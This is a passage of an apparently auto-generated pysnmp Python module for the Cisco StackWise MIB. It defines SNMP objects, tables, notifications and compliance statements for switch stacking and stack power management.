cswStackPowerInvalidTopology notification stackPowerBudgetWarning(10): enables/disables cswStackPowerBudgetWarning notification. stackPowerInvalidInputCurrent(11): enables/disables cswStackPowerInvalidInputCurrent notification. stackPowerInvalidOutputCurrent(12): enables/disables cswStackPowerInvalidOutputCurrent notification. stackPowerUnderBudget(13): enables/disables cswStackPowerUnderBudget notification. stackPowerUnbalancedPowerSupplies(14): enables/disables cswStackPowerUnbalancedPowerSupplies notification. stackPowerInsufficientPower(15): enables/disables cswStackPowerInsufficientPower notification. stackPowerPriorityConflict(16): enables/disables cswStackPowerPriorityConflict notification. stackPowerUnderVoltage(17): enables/disables cswStackPowerUnderVoltage notification. stackPowerGLS(18): enables/disables cswStackPowerGLS notification. stackPowerILS(19): enables/disabled cswStackPowerILS notification. stackPowerSRLS(20): enables/disables cswStackPowerSRLS notification. stackPowerSSLS(21): enables/disables cswStackPowerSSLS notification. stackMemberToBeReloadedForUpgrade(22): enables/disables cswStackMemberToBeReloadedForUpgrade notification.') cswStackDomainNum = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackDomainNum.setStatus('current') if mibBuilder.loadTexts: cswStackDomainNum.setDescription('This object indicates distributed domain of the switch.Only Switches with the same domain number can be in the same dist ributed domain.0 means no switch domain configured.') cswStackType = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackType.setStatus('current') if mibBuilder.loadTexts: cswStackType.setDescription('This object indicates type of switch stack. value of Switch virtual domain determines if switch is distributed or conventional stack. 0 means stack is conventional back side stack.') cswStackBandWidth = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackBandWidth.setStatus('current') if mibBuilder.loadTexts: cswStackBandWidth.setDescription('This object indicates stack bandwidth.') cswSwitchInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1), ) if mibBuilder.loadTexts: cswSwitchInfoTable.setStatus('current') if mibBuilder.loadTexts: cswSwitchInfoTable.setDescription("This table contains information specific to switches in a stack. Every switch with an entry in the entPhysicalTable (ENTITY-MIB) whose entPhysicalClass is 'chassis' will have an entry in this table.") cswSwitchInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex")) if mibBuilder.loadTexts: cswSwitchInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswSwitchInfoEntry.setDescription('A conceptual row in the cswSwitchInfoTable describing a switch information.') cswSwitchNumCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 1), CswSwitchNumber()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchNumCurrent.setStatus('current') if mibBuilder.loadTexts: cswSwitchNumCurrent.setDescription("This object contains the current switch identification number. This number should match any logical labeling on the switch. For example, a switch whose interfaces are labeled 'interface #3' this value should be 3.") cswSwitchNumNextReload = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 2), CswSwitchNumberOrZero()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchNumNextReload.setStatus('current') if mibBuilder.loadTexts: cswSwitchNumNextReload.setDescription("This object contains the cswSwitchNumCurrent to be used at next reload. The maximum value for this object is defined by the cswMaxSwitchNum object. Note: This object will contain 0 and cannot be set if the cswSwitchState value is other than 'ready'.") cswSwitchRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("master", 1), ("member", 2), ("notMember", 3), ("standby", 4)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchRole.setStatus('current') if mibBuilder.loadTexts: cswSwitchRole.setDescription('This object describes the function of the switch: master - stack master. member - active member of the stack. notMember - none-active stack member, see cswSwitchState for status. standby - stack standby switch.') cswSwitchSwPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 4), CswSwitchPriority()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchSwPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchSwPriority.setDescription("A number containing the priority of a switch. The switch with the highest priority will become the master. The maximum value for this object is defined by the cswMaxSwitchConfigPriority object. If after a reload the value of cswMaxSwitchConfigPriority changes to a smaller value, and the value of cswSwitchSwPriority has been previously set to a value greater or equal to the new cswMaxSwitchConfigPriority, then the SNMP agent must set cswSwitchSwPriority to the new cswMaxSwitchConfigPriority. Note: This object will contain the value of 0 if the cswSwitchState value is other than 'ready'.") cswSwitchHwPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 5), CswSwitchPriority()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchHwPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchHwPriority.setDescription("This object contains the hardware priority of a switch. If two or more entries in this table have the same cswSwitchSwPriority value during the master election time, the switch with the highest cswSwitchHwPriority will become the master. Note: This object will contain the value of 0 if the cswSwitchState value is other than 'ready'.") cswSwitchState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("waiting", 1), ("progressing", 2), ("added", 3), ("ready", 4), ("sdmMismatch", 5), ("verMismatch", 6), ("featureMismatch", 7), ("newMasterInit", 8), ("provisioned", 9), ("invalid", 10), ("removed", 11)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchState.setStatus('current') if mibBuilder.loadTexts: cswSwitchState.setDescription("The current state of a switch: waiting - Waiting for a limited time on other switches in the stack to come online. progressing - Master election or mismatch checks in progress. added - The switch is added to the stack. ready - The switch is operational. sdmMismatch - The SDM template configured on the master is not supported by the new member. verMismatch - The operating system version running on the master is different from the operating system version running on this member. featureMismatch - Some of the features configured on the master are not supported on this member. newMasterInit - Waiting for the new master to finish initialization after master switchover (Master Re-Init). provisioned - The switch is not an active member of the stack. invalid - The switch's state machine is in an invalid state. removed - The switch is removed from the stack.") cswSwitchMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 7), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchMacAddress.setStatus('current') if mibBuilder.loadTexts: cswSwitchMacAddress.setDescription("The MAC address of the switch. Note: This object will contain the value of 0000:0000:0000 if the cswSwitchState value is other than 'ready'.") cswSwitchSoftwareImage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 8), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchSoftwareImage.setStatus('current') if mibBuilder.loadTexts: cswSwitchSoftwareImage.setDescription("The software image type running on the switch. Note: This object will contain an empty string if the cswSwitchState value is other than 'ready'.") cswSwitchPowerBudget = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 9), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerBudget.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerBudget.setDescription('This object indicates the power budget of the switch.') cswSwitchPowerCommited = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 10), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerCommited.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerCommited.setDescription('This object indicates the power committed to the POE devices connected to the switch.') cswSwitchSystemPowerPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 11), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchSystemPowerPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchSystemPowerPriority.setDescription("This specifies the system's power priority. In case of a power failure then the system with the highest system priority will be brought down last.") cswSwitchPoeDevicesLowPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 12), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchPoeDevicesLowPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchPoeDevicesLowPriority.setDescription("This object specifies the priority of the system's low priority POE devices.") cswSwitchPoeDevicesHighPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 13), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchPoeDevicesHighPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchPoeDevicesHighPriority.setDescription("This object specifies the priority of the system's high priority POE devices. In order to avoid losing the high priority POE devices before the low priority POE devices, this object's value must be greater than value of cswSwitchPoeDevicesLowPriority.") cswSwitchPowerAllocated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 14), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerAllocated.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerAllocated.setDescription('This object indicates the power committed to the POE devices connected to the switch.') cswStackPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2), ) if mibBuilder.loadTexts: cswStackPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPortInfoTable.setDescription('This table contains stackport specific information. There exists an entry in this table for every physical stack port that have an entry in the ifTable (IF-MIB).') cswStackPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex")) if mibBuilder.loadTexts: cswStackPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPortInfoEntry.setDescription('A conceptual row in the cswStackPortInfoTable. An entry contains information about a stackport.') cswStackPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("forcedDown", 3)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPortOperStatus.setDescription('The state of the stackport. up - Connected and operational. down - Not connected to a neighboring switch or administrative down. forcedDown - Shut down by stack manager due to mismatch or stackport errors.') cswStackPortNeighbor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1, 2), EntPhysicalIndexOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPortNeighbor.setStatus('current') if mibBuilder.loadTexts: cswStackPortNeighbor.setDescription("This object contains the value of the entPhysicalIndex of the switch's chassis to which this stackport is connected to. If the stackport is not connected, the value 0 is returned.") cswDistrStackLinkInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3), ) if mibBuilder.loadTexts: cswDistrStackLinkInfoTable.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkInfoTable.setDescription('Distributed Stack Link Information.') cswDistrStackLinkInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswDSLindex")) if mibBuilder.loadTexts: cswDistrStackLinkInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkInfoEntry.setDescription('An Entry containing information about DSL link.') cswDSLindex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))) if mibBuilder.loadTexts: cswDSLindex.setStatus('current') if mibBuilder.loadTexts: cswDSLindex.setDescription('This is index of the distributed stack link with respect to each interface port') cswDistrStackLinkBundleOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackLinkBundleOperStatus.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkBundleOperStatus.setDescription('The state of the stackLink. up - Connected and operational. down - Not connected or administrative down.') cswDistrStackPhyPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4), ) if mibBuilder.loadTexts: cswDistrStackPhyPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortInfoTable.setDescription('This table contains objects for Distributed stack Link information Table.') cswDistrStackPhyPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswDSLindex"), (0, "IF-MIB", "ifIndex")) if mibBuilder.loadTexts: cswDistrStackPhyPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortInfoEntry.setDescription('An Entry containing information about stack port that is part of Distributed Stack Link.') cswDistrStackPhyPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPort.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPort.setDescription('This object indicates the name of distributed stack port.') cswDistrStackPhyPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortOperStatus.setDescription('The state of the distributed stackport. up - Connected and operational. down - Not connected to a neighboring switch or administrative down.') cswDistrStackPhyPortNbr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 3), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortNbr.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortNbr.setDescription("This object indicates the name of distributed stack port's neighbor.") cswDistrStackPhyPortNbrsw = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 4), EntPhysicalIndexOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortNbrsw.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortNbrsw.setDescription("This object indicates the EntPhysicalIndex of the distributed stack port's neigbor switch.") cswMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0)) cswStackPortChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 1)).setObjects(("IF-MIB", "ifIndex"), ("CISCO-STACKWISE-MIB", "cswStackPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPortChange.setStatus('current') if mibBuilder.loadTexts: cswStackPortChange.setDescription('This notification is generated when the state of a stack port has changed.') cswStackNewMaster = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackNewMaster.setStatus('current') if mibBuilder.loadTexts: cswStackNewMaster.setDescription('This notification is generated when a new master has been elected. The notification will contain the cswSwitchNumCurrent object to indicate the new master ID.') cswStackMismatch = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMismatch.setStatus('current') if mibBuilder.loadTexts: cswStackMismatch.setDescription('This notification is generated when a new member attempt to join the stack but was denied due to a mismatch. The cswSwitchState object will indicate the type of mismatch.') cswStackRingRedundant = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswRingRedundant")) if mibBuilder.loadTexts: cswStackRingRedundant.setStatus('current') if mibBuilder.loadTexts: cswStackRingRedundant.setDescription('This notification is generated when the redundancy of the ring has changed.') cswStackNewMember = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackNewMember.setStatus('current') if mibBuilder.loadTexts: cswStackNewMember.setDescription('This notification is generated when a new member joins the stack.') cswStackMemberRemoved = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 6)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMemberRemoved.setStatus('current') if mibBuilder.loadTexts: cswStackMemberRemoved.setDescription('This notification is generated when a member is removed from the stack.') cswStackPowerPortLinkStatusChanged = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 7)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatus"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerPortLinkStatusChanged.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortLinkStatusChanged.setDescription('This notification is generated when the link status of a stack power port is changed from up to down or down to up. This notification is for informational purposes only and no action is required. cswStackPowerPortLinkStatus indicates link status of the stack power ports. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerPortOperStatusChanged = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 8)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerPortOperStatusChanged.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOperStatusChanged.setDescription('This notification is generated when the operational status of a stack power port is changed from enabled to disabled or from disabled to enabled. This notification is for informational purposes only and no action is required. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortOperStatus indicates operational status of the stack power ports. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerVersionMismatch = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 9)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerVersionMismatch.setStatus('current') if mibBuilder.loadTexts: cswStackPowerVersionMismatch.setDescription('This notification is generated when the major version of the stack power protocol is different from the other members of the power stack. Upon receiving this notification, the user should make sure that he/she is using the same software version on all the members of the same power stack. cswSwitchNumCurrent indicates the switch number of the system seeing the power stack version mismatch.') cswStackPowerInvalidTopology = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 10)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerInvalidTopology.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidTopology.setDescription('This notification is generated when an invalid stack power topology is discovered by a switch. cswSwitchNumCurrent indicates the switch number of the system where the invalid topology is discovered.') cscwStackPowerBudgetWarrning = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 11)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cscwStackPowerBudgetWarrning.setStatus('current') if mibBuilder.loadTexts: cscwStackPowerBudgetWarrning.setDescription('This notification is generated when the switch power budget is more than 1000W above its power supplies rated power output. cswSwitchNumCurrent indicates the switch number of the system where the invalid power budget has been detected.') cswStackPowerInvalidInputCurrent = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 12)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerInvalidInputCurrent.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidInputCurrent.setDescription('This notification is generated when the input current in the stack power cable is over the limit of the threshold retrieved by the agent through cswStackPowerPortOverCurrentThreshold object. Upon receiving this notification, the user should add a power supply to the system whose switch number is generated with this notification. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortOverCurrentThreshold indicates the over current threshold of power stack cables. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerInvalidOutputCurrent = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 13)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerInvalidOutputCurrent.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidOutputCurrent.setDescription('This notification is generated when the output current in the stack power cable is over the limit of the threshold retrieved by the agent through cswStackPowerPortOverCurrentThreshold object. Upon receiving this notification, the user should remove a power supply from the system whose switch number is generated with this notification. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortOverCurrentThreshold indicates the over current threshold of power stack cables. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerUnderBudget = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 14)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerUnderBudget.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnderBudget.setDescription("This notification is generated when the switch's budget is less than maximum possible switch power consumption. cswSwitchNumCurrent indicates the switch number of the system that is running with the power budget less than the power consumption.") cswStackPowerUnbalancedPowerSupplies = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 15)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerUnbalancedPowerSupplies.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnbalancedPowerSupplies.setDescription('This notification is generated when the switch has no power supply but another switch in the same stack has more than one power supplies. cswStackPowerName specifies a unique name of the power stack where the unbalanced power supplies are detected.') cswStackPowerInsufficientPower = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 16)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerInsufficientPower.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInsufficientPower.setDescription("This notification is generated when the switch's power stack does not have enough power to bring up all the switches in the power stack. cswStackPowerName specifies a unique name of the power stack where insufficient power condition is detected.") cswStackPowerPriorityConflict = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 17)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerPriorityConflict.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPriorityConflict.setDescription("This notification is generated when the switch's power priorities are conflicting with power priorities of another switch in the same power stack. cswStackPowerPortName specifies the unique name of the power stack where the conflicting power priorities are detected.") cswStackPowerUnderVoltage = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 18)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerUnderVoltage.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnderVoltage.setDescription('This notification is generated when the switch had an under voltage condition on last boot up. cswSwitchNumCurrent indicates the switch number of the system that was forced down with the under voltage condition.') cswStackPowerGLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 19)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerGLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerGLS.setDescription('This notification is generated when the switch had to shed loads based on a sustained over load (SOC) condition. cswSwitchNumCurrent indicates the switch number of the system that goes through graceful load shedding.') cswStackPowerILS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 20)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerILS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerILS.setDescription('This notification is generated when the switch had to shed loads based on power supply fail condition. cswSwitchNumCurrent indicates the switch number of the system that goes through immediate load shedding.') cswStackPowerSRLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 21)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerSRLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSRLS.setDescription('This notification is generated when the switch had to shed loads based on loss of a system in ring topology. cswSwitchNumCurrent indicates the switch number of the system that detects the loss of system in ring topology.') cswStackPowerSSLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 22)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerSSLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSSLS.setDescription('This notification is generated when the switch had to shed loads based on loss of a system in star topology. cswSwitchNumCurrent indicates the switch number of the system that detects the loss of system in star topology.') cswStackMemberToBeReloadedForUpgrade = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 23)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMemberToBeReloadedForUpgrade.setStatus('current') if mibBuilder.loadTexts: cswStackMemberToBeReloadedForUpgrade.setDescription('This notification is generated when a member is to be reloaded for upgrade.') cswStackWiseMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1)) cswStackWiseMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2)) cswStackWiseMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 1)).setObjects(("CISCO-STACKWISE-MIB", "cswStatusGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBCompliance = cswStackWiseMIBCompliance.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBCompliance.setDescription('The compliance statement for entities that implement the CISCO-STACKWISE-MIB.') cswStackWiseMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev1 = cswStackWiseMIBComplianceRev1.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev1.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev2 = cswStackWiseMIBComplianceRev2.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev2.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", 